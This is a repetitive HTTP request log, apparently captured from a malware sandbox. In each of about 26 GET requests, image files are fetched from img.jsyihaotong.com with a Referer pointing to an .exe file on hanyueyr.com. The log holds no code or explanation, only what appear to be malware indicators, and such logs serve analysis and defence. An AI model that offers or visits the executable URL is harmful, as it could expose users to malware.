GET /uploads/88b301d0931a5e4d7c16f82b2c12b962.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/cdf9d4e6f91c9c5d3bd0a56c5006ae4f.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/f37d901910f19b0af5166732057cb55a.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/3d414ea885893bf375a872f619974e59.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/b607f5c525da30c92fe28fb9b5a75494.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/b76d637215dbe1935631deb860e9adcd.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/fd9a878938755a852faa2dfec51a63b3.jpg HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/b413c112c15900bb468f18131cea63d6.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/879e3b7573b0f1b643114de0f3630b4f.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/f560136e2c2ab5bf1371b2ad91dba9fa.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/e3be46ea3f70d518d5d655316989ccf6.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/d513716df9ee9c021a0a398c231f2dfc.jpg HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/586d94a9dc228f8b846e961412601a73.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/bd448c08ef8544f717e6375cf153c361.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/5bcd8d72c7e04fed54071b9ad48ce4b9.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/8dff3145eec719dab614bca26f7f5f0f.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/2235a4f5f5fe9c9b4bd11373cf0f8475.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/dea7889453f54f7b1891e9bf689ce3f4.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/bf973f0a4b671ea981776a3dd9bbcd6e.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/8e0051b1bf75e40819628d0075200ff2.jpg HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/0321e4fdfb835b45aeed17a9f0642d11.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/60d14e326ed05fc74bce118383b41a49.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/5706072a604e53ddcbdb6b0674cf0cf7.jpg HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/bc7726a08d1638c0084f38a9c1260b7c.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---
GET /uploads/8026845999d10786d33513f69af41ecd.gif HTTP/1.1 Host: img.jsyihaotong.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.hanyueyr.com/FCyTKH_426_111.exe	0.0.0.0 --- Additional Info ---